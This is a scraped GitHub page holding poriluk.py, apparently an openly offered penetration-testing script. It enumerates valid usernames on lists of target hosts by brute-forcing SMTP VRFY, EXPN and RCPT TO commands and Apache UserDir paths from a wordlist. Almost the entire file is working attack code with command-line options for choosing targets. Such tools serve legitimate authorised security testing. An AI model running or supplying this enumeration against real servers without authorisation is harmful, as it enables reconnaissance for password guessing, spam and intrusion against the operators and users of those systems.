-
Notifications
You must be signed in to change notification settings - Fork 122
/
Copy pathporiluk.py
351 lines (288 loc) · 9.61 KB
/
poriluk.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
#!/usr/bin/env python3
"""
poriluk.py 0.2 - Info Leakage Tactical Exploitation Tool
Copyright (c) 2017 Marco Ivaldi <[email protected]>
"The Other Way to Pen-Test" --HD Moore & Valsmith
I've always been a big proponent of a tactical approach
to penetration testing that does not focus on exploiting
known software vulnerabilities, but relies on old school
techniques such as information gathering and brute force.
Poriluk is a helper script that provides a comfortable
interface to exploit common info leakage vulnerabilities.
At the moment, the following attacks are supported:
SMTP: dictionary-based user enumeration via VRFY
SMTP: dictionary-based user enumeration via EXPN
SMTP: dictionary-based user enumeration via RCPT
HTTP: dictionary-based user enumeration via UserDir
Based on:
http://www.0xdeadbeef.info/code/brutus.pl
Requirements:
Python 3 (https://pythonclock.org/ is ticking...)
Example usage:
$ ./poriluk.py smtp -f hosts.txt -r -w users.txt
$ ./poriluk.py http -f hosts.txt -u -w users.txt
TODO:
Implement user enumeration via Microsoft RDP (rdpy)
Implement user enumeration via Cisco Telnet (telnetlib)
Introduce support for multi-threading?
Get the latest version at:
https://github.com/0xdea/tactical-exploitation/
"""
VERSION = "0.2"
BANNER = """
poriluk.py {0} - Info Leakage Tactical Exploitation Tool
Copyright (c) 2017 Marco Ivaldi <[email protected]>
""".format(VERSION)
import sys
import argparse
import smtplib
import urllib.request
import urllib.error
def smtp_enum(args):
"""
SMTP protocol exploitation
"""
wordlist = [u.rstrip() for u in args.w]
targets = get_targets(args)
port = args.P
ssl = args.S
timeout = args.T
debug = args.D
found_glob = 0
if args.vrfy:
cmd = "VRFY"
elif args.expn:
cmd = "EXPN"
elif args.rcpt:
cmd = "RCPT TO:"
if ssl:
call = smtplib.SMTP_SSL
else:
call = smtplib.SMTP
for host in targets:
found_host = 0
print("*** SMTP users on {0} ***\n".format(host))
found_host += smtp_do(call, cmd, wordlist, host, port, timeout, debug)
found_glob += found_host
print("\n*** {0} users found on {1} ***\n".format(found_host, host))
print("*** {0} users found globally ***\n".format(found_glob))
def smtp_do(call, cmd, wordlist, host, port, timeout, debug):
"""
SMTP user enumeration via VRFY/EXPN/RCPT
"""
found = 0
for username in wordlist:
try:
# speed hack: opening a new connection for each user is much faster
with call(
host=host,
port=port,
timeout=timeout,
local_hostname="test.com") as smtp:
# activate debug?
smtp.set_debuglevel(debug)
# initial helo turned out to be needed
smtp.helo("test.com")
if cmd == "RCPT TO:":
smtp.docmd("MAIL FROM:", args="<[email protected]>")
(res, msg) = smtp.docmd(cmd, args=username)
if str(res)[0] == "2": # user found
found += 1
if cmd == "RCPT TO:":
print(username)
else:
print(res, msg.decode(sys.stdout.encoding))
except (KeyboardInterrupt, SystemExit):
if username:
print("// error: interrupted at username '{0}'\n"
.format(username))
sys.exit(1)
except smtplib.SMTPException as err:
if username: # retry current user if timed out
found += smtp_do(
call, cmd, [username], host, port, timeout, debug)
except Exception as err:
print("// error: {0}".format(err))
return found
return found
def http_enum(args):
"""
HTTP protocol exploitation
"""
wordlist = [u.rstrip() for u in args.w]
targets = get_targets(args)
port = args.P
ssl = args.S
timeout = args.T
found_glob = 0
for host in targets:
found_host = 0
print("*** HTTP users on {0} ***\n".format(host))
if ssl:
website = "https://" + host
else:
website = "http://" + host
if port:
website += ":" + port
found_host += http_do(wordlist, website, timeout)
found_glob += found_host
print("\n*** {0} users found on {1} ***\n".format(found_host, host))
print("*** {0} users found globally ***\n".format(found_glob))
def http_do(wordlist, website, timeout):
"""
HTTP user enumeration via UserDir
"""
found = 0
for username in wordlist:
url = website + "/~" + username
try:
# this is blazingly fast
with urllib.request.urlopen(
url=url,
timeout=timeout) as http:
if http.read(1000).decode(sys.stdout.encoding): # user found
found += 1
print(username)
except (KeyboardInterrupt, SystemExit):
if username:
print("// error: interrupted at username '{0}'\n"
.format(username))
sys.exit(1)
except urllib.error.HTTPError as err:
if err.code == 403: # user found
found += 1
print(username)
except Exception as err:
print("// error: {0}".format(err))
return found
return found
def get_targets(args):
"""
Get targets from command line or file
"""
if args.t: return [args.t]
return [t.rstrip() for t in args.f]
def get_args():
"""
Get command line arguments
"""
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(
title="commands",
help="choose target network protocol")
# smtp mode
parser_smtp = subparsers.add_parser(
"smtp",
help="SMTP protocol exploitation")
parser_smtp.set_defaults(func=smtp_enum)
# smtp: actions
group_smtp_actions = parser_smtp.add_mutually_exclusive_group(required=True)
group_smtp_actions.add_argument(
"-v", "--vrfy",
action="store_true",
help="user enumeration via VRFY")
group_smtp_actions.add_argument(
"-e", "--expn",
action="store_true",
help="user enumeration via EXPN")
group_smtp_actions.add_argument(
"-r", "--rcpt",
action="store_true",
help="user enumeration via RCPT")
# smtp: targets
group_smtp_targets = parser_smtp.add_mutually_exclusive_group(required=True)
group_smtp_targets.add_argument(
"-t",
metavar="HOST",
help="specify target hostname or IP address")
group_smtp_targets.add_argument(
"-f",
metavar="FILE",
type=argparse.FileType("r"),
help="specify file containing a list of targets")
# smtp: other arguments
parser_smtp.add_argument(
"-w",
metavar="WORDLIST",
type=argparse.FileType("r"),
required=True,
help="specify username wordlist")
parser_smtp.add_argument(
"-T",
metavar="TIMEOUT",
type=int,
default=5,
help="specify timeout in seconds (default: 5)")
parser_smtp.add_argument(
"-P",
metavar="PORT",
type=int,
default=0,
help="specify port to use (default: 25 or 465)")
parser_smtp.add_argument(
"-S",
action="store_true",
help="enable SMTPS")
parser_smtp.add_argument(
"-D",
action="store_true",
help="enable debug mode")
# http mode
parser_http = subparsers.add_parser(
"http",
help="HTTP protocol exploitation")
parser_http.set_defaults(func=http_enum)
# http: actions
group_http_actions = parser_http.add_mutually_exclusive_group(required=True)
group_http_actions.add_argument(
"-u", "--userdir",
action="store_true",
help="user enumeration via Apache mod_userdir")
# http: targets
group_http_targets = parser_http.add_mutually_exclusive_group(required=True)
group_http_targets.add_argument(
"-t",
metavar="HOST",
help="specify target hostname or IP address")
group_http_targets.add_argument(
"-f",
metavar="FILE",
type=argparse.FileType("r"),
help="specify file containing a list of targets")
# http: other arguments
parser_http.add_argument(
"-w",
metavar="WORDLIST",
type=argparse.FileType("r"),
required=True,
help="specify username wordlist")
parser_http.add_argument(
"-T",
metavar="TIMEOUT",
type=int,
default=5,
help="specify timeout in seconds (default: 5)")
parser_http.add_argument(
"-P",
metavar="PORT",
help="specify port to use (default: 80 or 443)")
parser_http.add_argument(
"-S",
action="store_true",
help="enable HTTPS")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
return parser.parse_args()
def main():
"""
Main function
"""
print(BANNER)
if sys.version_info[0] != 3:
print("// error: this script requires python 3")
sys.exit(1)
args = get_args()
args.func(args)
if __name__ == "__main__":
main()